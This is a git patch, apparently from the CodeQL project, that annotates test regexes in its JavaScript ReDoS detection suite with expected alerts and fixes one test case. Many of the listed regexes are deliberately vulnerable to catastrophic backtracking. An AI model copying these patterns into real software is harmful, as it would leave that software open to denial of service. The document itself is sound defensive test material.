(INSERT\sINTO\s[\d\w]+[\s\w\d\)\(\,]*\sVALUES\s\([\d\w\'\,\)]+)| (DELETE\sFROM\s[\d\w\'\=]+)/g; -/"([^"](?:\\.|[^\\"]*)*)"/g; +/"([^"](?:\\.|[^\\"]*)*)"/g; // $ Alert[js/redos] /href=[\"\'](http:\/\/|\.\/|\/)?\w+(\.\w+)*(\/\w+(\.\w+)?)*(\/|\?\w*=\w*(&\w*=\w*)*)?[\"\']/g; //g; /(?s)( class=\w+(?=([^<]*>)))|()|()|()|([^<]*<\/o:p>)|(]*>)|(<\/span>)|(font-family:[^>]*[;'])|(font-size:[^>]*[;'])(?-s)/g; -/<(?:[^"']+?|.+?(?:"|').*?(?:"|')?.*?)*?>/g; +/<(?:[^"']+?|.+?(?:"|').*?(?:"|')?.*?)*?>/g; // $ Alert[js/redos] /<(?.*).*>(?.*)<\/\k>/g; /<(\/{0,1})img(.*?)(\/{0,1})\>/g; /src[^>]*[^/].(?:jpg|bmp|gif)(?:\"|\')/g; -/<(\w+)(\s(\w*=".*?")?)*((\/>)|((\/*?)>.*?<\/\1>))/g; +/<(\w+)(\s(\w*=".*?")?)*((\/>)|((\/*?)>.*?<\/\1>))/g; // $ Alert[js/redos] /(?i:on(blur|c(hange|lick)|dblclick|focus|keypress|(key|mouse)(down|up)|(un)?load|mouse(move|o(ut|ver))|reset|s(elect|ubmit)))/g; /([^'("|')]*)("|')){1}|content\s*=\s*("|')(?[^'("|')]*)("|')|scheme\s*=\s*("|')(?[^'("|')]*)("|'))/g; /<\*?font # Match start of Font Tag (?(?=[^>]+color.*>) #IF\/THEN lookahead color in tag (.*?color\s*?[=|:]\s*?) # IF found THEN move ahead ('+\#*?[\w\s]*'+ # CAPTURE ColorName\/Hex |"+\#*?[\w\s]*"+ # single or double |\#*\w*\b) # or no quotes .*?> # & move to end of tag |.*?> # ELSE move to end of Tag ) # Close the If\/Then lookahead # Use Multiline and IgnoreCase # Replace the matches from RE with MatchEvaluator below: # if m.Groups(1).Value<>"" then # Return "" # else # Return "" # end if/g; /(?'openingTag'<) \s*? (?'tagName'\w+) # Once we've got the tagname, match zero # or more attribute sequences (\s*? # Atomic Grouping for efficiency (?> (?!=[\/\?]?>) # Lookahead so that we can fail quickly # match Attribute pieces (?'attribName'\w+) (?:\s* (?'attribSign'=) \s* ) (?'attribValue' (?:\'[^\']*\'|\"[^\"]*\"|[^ >]+) ) ) )* \s*? # Closing Tag can be either > or \/> (?'closeTag'[\/\?]?>)/g; /^#?(([fFcC0369])\2){3}$/g; /&(?![a-zA-Z]{2,6};|#[0-9]{3};)/g; -/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; +/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; // $ Alert[js/redos] /<[a-zA-Z][^>]*\son\w+=(\w+|'[^']*'|"[^"]*")[^>]*>/g; />(?:(?[^<]*))/g; /<[^>]*name[\s]*=[\s]*"?[^\w_]*"?[^>]*>/g; @@ -34,26 +34,26 @@ /<([^\s>]*)(\s[^<]*)>/g; /^[a-zA-Z_]{1}[a-zA-Z0-9_]+$/g; /[0][x][0-9a-fA-F]+/g; -/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; +/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; // $ Alert[js/redos] /%[\-\+0\s\#]{0,1}(\d+){0,1}(\.\d+){0,1}[hlI]{0,1}[cCdiouxXeEfgGnpsS]{1}/g; /^(Function|Sub)(\s+[\w]+)\([^\(\)]*\)/g; -/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; +/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; // $ Alert[js/redos] /^(?([^"']|"[^"]*")*)'(?.*)$/g; />(?:(?[^<]*))/g; /<[a-zA-Z][^>]*\son\w+=(\w+|'[^']*'|"[^"]*")[^>]*>/g; /<[^>]*name[\s]*=[\s]*"?[^\w_]*"?[^>]*>/g; /\/\*[\d\D]*?\*\//g; /^#?([a-f]|[A-F]|[0-9]){3}(([a-f]|[A-F]|[0-9]){3})?$/g; -/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; +/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; // $ Alert[js/redos] //g; /("[^"]*")|('[^\r]*)(\r\n)?/g; /(?'openingTag'<) \s*? (?'tagName'\w+) # Once we've got the tagname, match zero # or more attribute sequences (\s*? # Atomic Grouping for efficiency (?> (?!=[\/\?]?>) # Lookahead so that we can fail quickly # match Attribute pieces (?'attribName'\w+) (?:\s* (?'attribSign'=) \s* ) (?'attribValue' (?:\'[^\']*\'|\"[^\"]*\"|[^ >]+) ) ) )* \s*? # Closing Tag can be either > or \/> (?'closeTag'[\/\?]?>)/g; /&(?![a-zA-Z]{2,6};|#[0-9]{3};)/g; /^#?(([fFcC0369])\2){3}$/g; -/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; +/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; // $ Alert[js/redos] /[0][x][0-9a-fA-F]+/g; /%[\-\+0\s\#]{0,1}(\d+){0,1}(\.\d+){0,1}[hlI]{0,1}[cCdiouxXeEfgGnpsS]{1}/g; -/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; +/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; // $ Alert[js/redos] /^(Function|Sub)(\s+[\w]+)\([^\(\)]*\)/g; /^[a-zA-Z_]{1}[a-zA-Z0-9_]+$/g; /^[^<>`~!/@\#}$%:;)(_^{&*=|'+]+$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js index db1e10df7386..550fff9a1225 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js @@ -1,7 +1,7 @@ /^\d{3}\s?\d{3}$/g; /^([a-zA-Z0-9@*#]{8,15})$/g; /^(?=.*\d).{4,8}$/g; -/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*$/g; +/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*$/g; // $ Alert[js/redos] /((\(\d{3}\) ?)|(\d{3}-))?\d{3}-\d{4}/g; /^\D?(\d{3})\D?\D?(\d{3})\D?(\d{4})$/g; /^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?!.*\s).{4,8}$/g; @@ -12,7 +12,7 @@ /[:]{1}[-~+o]?[)>]+/g; /^\d{5}(-\d{4})?$/g; /^([a-z0-9]{32})$/g; -/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; +/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; // $ Alert[js/redos] /\u00A3/g; /\u2122/g; /^[{|\(]?[0-9a-fA-F]{8}[-]?([0-9a-fA-F]{4}[-]?){3}[0-9a-fA-F]{12}[\)|}]?$/g; @@ -21,7 +21,7 @@ /^(([\w][\w\-\.]*)\.)?([\w][\w\-]+)(\.([\w][\w\.]*))?$/g; /^(eth[0-9]$)|(^eth[0-9]:[1-9]$)/g; /^((Fred|Wilma)\s+Flintstone|(Barney|Betty)\s+Rubble)$/g; -/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; +/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; // $ Alert[js/redos] /\u00A3/g; /^([a-z0-9]{32})$/g; /[:]{1}[-~+o]?[)>]+/g; @@ -76,7 +76,7 @@ /(AUX|PRN|NUL|COM\d|LPT\d)+\s*$/g; /^[a-zA-Z]{1,2}[0-9][0-9A-Za-z]{0,1} {0,1}[0-9][A-Za-z]{2}$/g; /\d{4}-?\d{4}-?\d{4}-?\d{4}/g; -/^(\/w|\/W|[^<>+?$%{}&])+$/g; +/^(\/w|\/W|[^<>+?$%{}&])+$/g; // $ Alert[js/redos] /([0-1][0-9]|2[0-3]):[0-5][0-9]/g; /([A-Zäöü0-9\/][^a-z\:\,\(\)]*[A-Zäöü0-9])($|[\.\:\,\;\)\-\ \+]|s\b)/g; /^[\u0081-\uFFFF]{1,}$/g; @@ -87,7 +87,7 @@ /^(?n:(?!-[\d\,]*K) (?!-((\d{1,3},)*((([3-9]\d\d|2[89]\d|27[4-9])\xB0C)|(((4[6-9]|[5-9]\d)\d)\xB0F)))) -?\d{1,3}(,\d{3})*(\xB0[CF]|K) )$/g; /^[+]447\d{9}$/g; /[1-2][0|9][0-9]{2}[0-1][0-9][0-3][0-9][-][0-9]{4}/g; -/^(([a-z])+.)+[A-Z]([a-z])+$/g; +/^(([a-z])+.)+[A-Z]([a-z])+$/g; // $ Alert[js/redos] /(?-i:\b\p{Lu}+\b)/g; /^(\d{5}((|-)-\d{4})?)|([A-Za-z]\d[A-Za-z][\s\.\-]?(|-)\d[A-Za-z]\d)|[A-Za-z]{1,2}\d{1,2}[A-Za-z]? \d[A-Za-z]{2}$/g; /(.*\.([wW][mM][aA])|([mM][pP][3])$)/g; @@ -120,7 +120,7 @@ /^(.|\n){0,16}$/g; /\p{N}/g; /^[a-zA-Z0-9]{1,20}$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /^[^#]([^ ]+ ){6}[^ ]+$/g; /^[AaWaKkNn][a-zA-Z]?[0-9][a-zA-Z]{1,3}$/g; /^[a-z]+[0-9]*[a-z]+$/g; @@ -139,13 +139,13 @@ /^[0-9]{2}[-][0-9]{2}[-][0-9]{2}$/g; /^\(?082|083|084|072\)?[\s-]?[\d]{3}[\s-]?[\d]{4}$/g; /(\{\\f\d*)\\([^;]+;)/g; -/^(\/w|\/W|[^<>+?$%{}&])+$/g; +/^(\/w|\/W|[^<>+?$%{}&])+$/g; // $ Alert[js/redos] /^\(\d{1,2}(\s\d{1,2}){1,2}\)\s(\d{1,2}(\s\d{1,2}){1,2})((-(\d{1,4})){0,1})$/g; /(("|')[a-z0-9\/\.\?\=\&]*(\.htm|\.asp|\.php|\.jsp)[a-z0-9\/\.\?\=\&]*("|'))|(href=*?[a-z0-9\/\.\?\=\&"']*)/g; /^]*)>(.*?(?=<\/a>))<\/a>$/g; /^[0-9A-Za-z_ ]+(.[jJ][pP][gG]|.[gG][iI][fF])$/g; /^(?(^00000(|-0000))|(\d{5}(|-\d{4})))$/g; -/\w?<\s?\/?[^\s>]+(\s+[^"'=]+(=("[^"]*")|('[^\']*')|([^\s"'>]*))?)*\s*\/?>/g; +/\w?<\s?\/?[^\s>]+(\s+[^"'=]+(=("[^"]*")|('[^\']*')|([^\s"'>]*))?)*\s*\/?>/g; // $ Alert[js/redos] /^([A-PR-UWYZ0-9][A-HK-Y0-9][AEHMNPRTVXY0-9]?[ABEHMNPRVWXY0-9]? {1,2}[0-9][ABD-HJLN-UW-Z]{2}|GIR 0AA)$/g; /^([ \u00c0-\u01ffa-zA-Z'])+$/g; /[^abc]/g; @@ -170,4 +170,4 @@ /(?-i:\b\p{Lu}+\b)/g; /^[+]447\d{9}$/g; /[1-2][0|9][0-9]{2}[0-1][0-9][0-3][0-9][-][0-9]{4}/g; -/^(([a-z])+.)+[A-Z]([a-z])+$/g; +/^(([a-z])+.)+[A-Z]([a-z])+$/g; // $ Alert[js/redos] diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js index 888f1f5fb7dc..f4ebd5b8de9e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js @@ -16,7 +16,7 @@ /^(?=[^\d_].*?\d)\w(\w|[!@#$%]){7,20}/g; /^([A-Z|a-z|&]{3}\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)(\w{2})([A|a|0-9]{1})$|^([A-Z|a-z]{4}\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)((\w{2})([A|a|0-9]{1})){0,3}$/g; /^((4\d{3})|(5[1-5]\d{2})|(6011))-?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}$/g; -/^[\.\wæøå-]+@([a-zæøå0-9]+([\.-]{0,1}[a-zæøå0-9]+|[a-zæøå0-9]?))+\.[a-z]{2,6}$/g; +/^[\.\wæøå-]+@([a-zæøå0-9]+([\.-]{0,1}[a-zæøå0-9]+|[a-zæøå0-9]?))+\.[a-z]{2,6}$/g; // $ Alert[js/redos] /"((\\")|[^"(\\")])+"/g; /<[^>]+>/g; /^(?n:(?(St\.\ )?(?-i:[A-Z]\'?\w+?\-?)+)(?\ (?i:([JS]R)|((X(X{1,2})?)?((I((I{1,2})|V|X)?)|(V(I{0,3})))?)))?,((?Dr|Prof|M(r?|(is)?)s)\ )?(?(?-i:[A-Z]\'?(\w+?|\.)\ ??){1,2})?(\ (?(?-i:[A-Z])(\'?\w+?|\.))){0,2})$/g; @@ -44,17 +44,17 @@ /^([4]{1})([0-9]{12,15})$/g; /^([34|37]{2})([0-9]{13})$/g; /^([A-Z]{3}\s?(\d{3}|\d{2}|d{1})\s?[A-Z])|([A-Z]\s?(\d{3}|\d{2}|\d{1})\s?[A-Z]{3})|(([A-HK-PRSVWY][A-HJ-PR-Y])\s?([0][2-9]|[1-9][0-9])\s?[A-HJ-PR-Z]{3})$/g; -/(\S*)+(\u007C)+(\S*)/g; +/(\S*)+(\u007C)+(\S*)/g; // $ Alert[js/redos] /([^\.\?\!]*)[\.\?\!]/g; /(\S+)\x20{2,}(?=\S+)/g; /^([6011]{4})([0-9]{12})$/g; /^([30|36|38]{2})([0-9]{12})$/g; /^(?!000)(?!666)(?[0-6]\d{2}|7(?:[0-6]\d|7[012]))([- ]?)(?!00)(?\d\d)\1(?!0000)(?\d{4})$/g; -/^([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?\.){0,}([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?){1,63}(\.[a-z0-9]{2,7})+$/g; +/^([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?\.){0,}([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?){1,63}(\.[a-z0-9]{2,7})+$/g; // $ Alert[js/redos] /(NOT)?(\s*\(*)\s*(\w+)\s*(=|<>|<|>|LIKE|IN)\s*(\(([^\)]*)\)|'([^']*)'|(-?\d*\.?\d+))(\s*\)*\s*)(AND|OR)?/g; /^[0-9]{1,}(,[0-9]+){0,}$/g; /^(?!^(PRN|AUX|CLOCK\$|NUL|CON|COM\d|LPT\d|\..*)(\..+)?$)[^\x00-\x1f\\?*<>:\;|\"/]+$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /^([1-9]{1}[0-9]{3}[,]?)*([1-9]{1}[0-9]{3})$/g; /^(?=((0[1-9]0)|([1-7][1-7]\d)|(00[1-9])|(0[1-9][1-9]))-(?=(([1-9]0)|(0[1-9])|([1-9][1-9]))-(?=((\d{3}[1-9])$|([1-9]\d{3})$|(\d[1-9]\d{2})$|(\d{2}[1-9]\d)$))))/g; /(\b\w+\b)/g; @@ -78,7 +78,7 @@ /^(\d{4}-){3}\d{4}$|^(\d{4} ){3}\d{4}$|^\d{16}$/g; /^(?[^,]+),(?[^,]+),(?[^,]+)$/g; /^(([a-h,A-H,j-n,J-N,p-z,P-Z,0-9]{9})([a-h,A-H,j-n,J-N,p,P,r-t,R-T,v-z,V-Z,0-9])([a-h,A-H,j-n,J-N,p-z,P-Z,0-9])(\d{6}))$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /(NOT)?(\s*\(*)\s*(\w+)\s*(=|<>|<|>|LIKE|IN)\s*(\(([^\)]*)\)|'([^']*)'|(-?\d*\.?\d+))(\s*\)*\s*)(AND|OR)?/g; /^[0-9]{1,}(,[0-9]+){0,}$/g; /^([4]{1})([0-9]{12,15})$/g; @@ -88,4 +88,4 @@ /([^\.\?\!]*)[\.\?\!]/g; /(\S+)\x20{2,}(?=\S+)/g; /^([A-Z]{3}\s?(\d{3}|\d{2}|d{1})\s?[A-Z])|([A-Z]\s?(\d{3}|\d{2}|\d{1})\s?[A-Z]{3})|(([A-HK-PRSVWY][A-HJ-PR-Y])\s?([0][2-9]|[1-9][0-9])\s?[A-HJ-PR-Z]{3})$/g; -/(\S*)+(\u007C)+(\S*)/g; +/(\S*)+(\u007C)+(\S*)/g; // $ Alert[js/redos] diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js index 90d83b56ad3d..29ce77334563 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js @@ -1,8 +1,8 @@ /^(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])$/g; /(http|ftp|https):\/\/[\w\-_]+(\.[\w\-_]+)+([\w\-\.,@?^=%&:/~\+#]*[\w\-\@?^=%&/~\+#])?/g; -/(?:(?http(?:s?)|ftp)(?:\:\/\/)) (?:(?\w+\:\w+)(?:\@))? (?[^/\r\n\:]+)? (?\:\d+)? (?(?:\/.*)*\/)? (?.*?\.(?\w{2,4}))? (?\??(?:\w+\=[^\#]+)(?:\&?\w+\=\w+)*)* (?\#.*)?/g; +/(?:(?http(?:s?)|ftp)(?:\:\/\/)) (?:(?\w+\:\w+)(?:\@))? (?[^/\r\n\:]+)? (?\:\d+)? (?(?:\/.*)*\/)? (?.*?\.(?\w{2,4}))? (?\??(?:\w+\=[^\#]+)(?:\&?\w+\=\w+)*)* (?\#.*)?/g; // $ Alert[js/redos] /^[^\\\/\?\*\"\'\>\<\:\|]*$/g; -/^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w ]*.*))+\.(txt|TXT)$/g; +/^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w ]*.*))+\.(txt|TXT)$/g; // $ Alert[js/redos] /(?!\.)[a-z]{1,4}$/g; /^([a-zA-Z]\:) (\\{1}| ((\\{1}) [^\\] ([^/:*?<>"|]*(?|]?$/g; -/^[a-z]+([a-z0-9-]*[a-z0-9]+)?(\.([a-z]+([a-z0-9-]*[a-z0-9]+)?)+)*$/g; +/^[a-z]+([a-z0-9-]*[a-z0-9]+)?(\.([a-z]+([a-z0-9-]*[a-z0-9]+)?)+)*$/g; // $ Alert[js/redos] /(.*?)<\/a>/g; /^[^\\\./:\*\?\"<>\|]{1}[^\\/:\*\?\"<>\|]{0,254}$/g; /^[a-zA-Z0-9]+([a-zA-Z0-9\-\.]+)?\.(aero|biz|com|coop|edu|gov|info|int|mil|museum|name|net|org|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly| ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk| pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr| st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zr|zw|AERO|BIZ|COM|COOP|EDU|GOV|INFO|INT|MIL|MUSEUM|NAME|NET|ORG|AC|/g; @@ -52,7 +52,7 @@ /9[0-9]/g; /([^\=&]+)(?|]?$/g; /^((\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5]))$/g; /((http\:\/\/|https\:\/\/|ftp\:\/\/)|(www.))+(([a-zA-Z0-9\.-]+\.[a-zA-Z]{2,4})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(\/[a-zA-Z0-9%:/-_\?\.'~]*)?/g; @@ -60,7 +60,7 @@ /^(ht|f)tp((?<=http)s)?:\/\/((?<=http:\/\/)www|(?<=https:\/\/)www|(?<=ftp:\/\/)ftp)\.(([a-z][0-9])|([0-9][a-z])|([a-z0-9][a-z0-9\-]{1,2}[a-z0-9])|([a-z0-9][a-z0-9\-](([a-z0-9\-][a-z0-9])|([a-z0-9][a-z0-9\-]))[a-z0-9\-]*[a-z0-9]))\.(co|me|org|ltd|plc|net|sch|ac|mod|nhs|police|gov)\.uk$/g; /^DOMAIN\\\w+$/g; /^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)*((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|localhost|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.(com|edu|gov|int|mil|net|org|biz|arpa|info|name|pro|aero|coop|museum|[a-zA-Z]{2}))(\:[0-9]+)*(\/($|[a-zA-Z0-9\.\,\?\'\\\+&%\$#\=~_\-]+))*$/g; -/^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)?((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.[a-zA-Z]{2,4})(\:[0-9]+)?(\/[^/][a-zA-Z0-9\.\,\?\'\\/\+&%\$#\=~_\-@]*)*$/g; +/^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)?((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.[a-zA-Z]{2,4})(\:[0-9]+)?(\/[^/][a-zA-Z0-9\.\,\?\'\\/\+&%\$#\=~_\-@]*)*$/g; // $ Alert[js/redos] /^\\{2}[\w-]+\\(([\w-][\w-\s]*[\w-]+[$$]?$)|([\w-][$$]?$))/g; /(^[a-zA-Z0-9]+:\/\/)/g; /^http:\/\/([a-zA-Z0-9_\-]+)([\.][a-zA-Z0-9_\-]+)+([/][a-zA-Z0-9\~\(\)_\-]*)+([\.][a-zA-Z0-9\(\)_\-]+)*$/g; From 607b184a7f9ec468e617a832541afb7465fe887a Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:58:15 +0100 Subject: [PATCH 085/892] JS: Fix a bug in test case --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 55b173b0f779..455db4f86e93 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -102,7 +102,7 @@ var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert -var bad26 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; +var fix25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; // OK - fixed version of bad25 var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert From 